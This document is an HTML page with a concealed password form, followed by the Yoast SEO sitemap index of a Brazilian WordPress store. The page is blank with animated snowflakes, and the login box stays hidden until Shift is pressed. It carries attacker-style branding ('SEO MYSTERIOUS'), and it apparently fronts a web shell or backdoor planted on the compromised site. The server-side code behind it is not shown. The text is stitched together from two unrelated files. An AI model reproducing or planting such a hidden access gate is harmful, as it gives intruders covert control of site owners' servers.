<!DOCTYPE html>
<html>
<head>
    <title></title>
    <style>
        body {
            margin: 0;
            padding: 0;
            height: 100vh;
            width: 100vw;
            background: #fff; 
            overflow: hidden;
            position: relative;
        }
        .login-container {
            display: none;
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            width: 300px;
            background: #fff;
            padding: 20px;
            border: 1px solid #ccc;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
            text-align: center;
            z-index: 1;
        }
        .login-container input {
            width: calc(100% - 22px);
            padding: 10px;
            margin: 10px 0;
            box-sizing: border-box;
        }
        .snowflake {
            position: absolute;
            background: white;
            border-radius: 50%;
            width: 5px;
            height: 5px;
            opacity: 0.8;
            pointer-events: none;
            z-index: 0;
            animation: fall linear;
        }
        @keyframes fall {
            to {
                transform: translateY(100vh);
            }
        }
    </style>
</head>
<body>
    <div class="login-container" id="loginBox">
        <form method="POST" action="">
            <label for="password">
                SEO MYSTERIOUS | Fortune Always Favours The Bold.
				SOME TIMES YOU WIN, SOMETIMES YOU LEARN.
            </label>
            <input type="password" id="password" name="password" autofocus>
            <input type="submit" value="acceso">
        </form>
    </div>

    <script>
        function createSnowflake() {
            const snowflake = document.createElement('div');
            snowflake.className = 'snowflake';
            snowflake.style.left = Math.random() * 100 + 'vw';
            snowflake.style.animationDuration = Math.random() * 3 + 2 + 's';
            snowflake.style.opacity = Math.random();
            document.body.appendChild(snowflake);
            
            setTimeout(() => {
                snowflake.remove();
            }, 5000);
        }

        setInterval(createSnowflake, 100);

        document.addEventListener("keydown", function(e) {
            if (e.key === "Shift") {
                document.getElementById("loginBox").style.display = "block";
            }
        });
    </script>
</body>
</html><?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//sentidocosmopolita.com.br/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://sentidocosmopolita.com.br/page-sitemap.xml</loc>
		<lastmod>2025-08-07T17:59:12+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://sentidocosmopolita.com.br/product-sitemap.xml</loc>
		<lastmod>2026-05-17T17:34:07+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://sentidocosmopolita.com.br/product_cat-sitemap.xml</loc>
		<lastmod>2026-05-17T17:34:07+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://sentidocosmopolita.com.br/product_tag-sitemap.xml</loc>
		<lastmod>2026-05-17T17:34:07+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->